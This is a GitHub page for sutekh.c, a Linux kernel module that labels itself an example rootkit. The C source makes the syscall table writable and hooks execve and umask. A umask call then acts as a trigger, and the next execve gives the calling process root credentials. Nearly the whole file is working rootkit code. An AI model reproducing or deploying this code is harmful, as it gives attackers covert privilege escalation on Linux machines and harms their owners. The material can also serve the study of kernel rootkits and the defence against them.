-
Notifications
You must be signed in to change notification settings - Fork 21
/
sutekh.c
142 lines (120 loc) · 3.39 KB
/
sutekh.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
/* An example rootkit that gives root permissions to a userland process */
#include <asm/unistd.h>
#include <asm/cacheflush.h>
#include <asm/pgtable_types.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>
#include <linux/cred.h>
#define MA "@Pink_P4nther"
#define MD "Example Rootkit"
#define ML "GPL"
#define MV "1.1"
/* Enable root escalation flag */
int ref = 0;
/* Syscall table address */
void **sct_address;
/* Set sys_call_table address to sct_address */
void set_sct_addr(void);
/* Execve syscall hook */
asmlinkage int (*origin_execvecall) (const char *filename, const char *const argv[], const char *const envp[]);
/* Mal execve hook syscall */
asmlinkage int mal_execve(const char *filename, const char *const argv[], const char *const envp[])
{
if (ref == 1){
printk(KERN_INFO "[+] Giving r00t!");
/* Create process cred struct */
struct cred *np;
/* Create uid struct */
kuid_t nuid;
/* Set uid struct value to 0 */
nuid.val = 0;
/* Prepares new set of credentials for task_struct of current process */
np = prepare_creds();
/* Set uid of new cred struct to 0 */
np->uid = nuid;
/* Set euid of new cred struct to 0 */
np->euid = nuid;
/* Commit cred to task_struct of process */
commit_creds(np);
}
/* Call original execve syscall */
return origin_execvecall(filename,argv,envp);
}
/* Umask syscall hook */
asmlinkage int (*origin_umaskcall) (mode_t mask);
/* Mal umask hook syscall */
asmlinkage int mal_umask(mode_t mask){
if (ref == 0){
/* Set enable root escalation flag */
ref = 1;
} else{
/* Unset enable root escalation flag */
ref = 0;
}
/* Call original umask syscall */
return origin_umaskcall(mask);
}
/* Set SCT Address */
void set_sct_addr(void)
{
/* Lookup address for sys_call_table and set sct_address to it */
sct_address = (void*)kallsyms_lookup_name("sys_call_table");
}
/* Make SCT writeable */
int sct_w(unsigned long sct_addr)
{
unsigned int level;
pte_t *pte = lookup_address(sct_addr,&level);
if (pte->pte &~_PAGE_RW)
{
pte->pte |=_PAGE_RW;
}
return 0;
}
/* Make SCT write protected */
int sct_xw(unsigned long sct_addr)
{
unsigned int level;
pte_t *pte = lookup_address(sct_addr, &level);
pte->pte = pte->pte &~_PAGE_RW;
return 0;
}
/* Loads LKM */
static int __init hload(void)
{
/* Set syscall table address */
set_sct_addr();
/* Set pointer to original syscalls */
origin_execvecall = sct_address[__NR_execve];
origin_umaskcall = sct_address[__NR_umask];
/* Make SCT writeable */
sct_w((unsigned long)sct_address);
/* Hook execve and umask syscalls */
sct_address[__NR_execve] = mal_execve;
sct_address[__NR_umask] = mal_umask;
/* Set SCT write protected */
sct_xw((unsigned long)sct_address);
printk(KERN_INFO "[?] SCT: [0x%llx]\n[?] EXECVE: [0x%llx]\n[?] UMASK: [0x%llx]",sct_address,sct_address[__NR_execve],sct_address[__NR_umask]);
return 0;
}
/* Unloads LKM */
static void __exit hunload(void)
{
/* Rewrite the original syscall addresses back into the SCT page */
sct_w((unsigned long )sct_address);
sct_address[__NR_execve] = origin_execvecall;
sct_address[__NR_umask] = origin_umaskcall;
/* Make SCT page write protected */
sct_xw((unsigned long)sct_address);
}
module_init(hload);
module_exit(hunload);
MODULE_LICENSE(ML);
MODULE_AUTHOR(MA);
MODULE_DESCRIPTION(MD);
MODULE_VERSION(MV);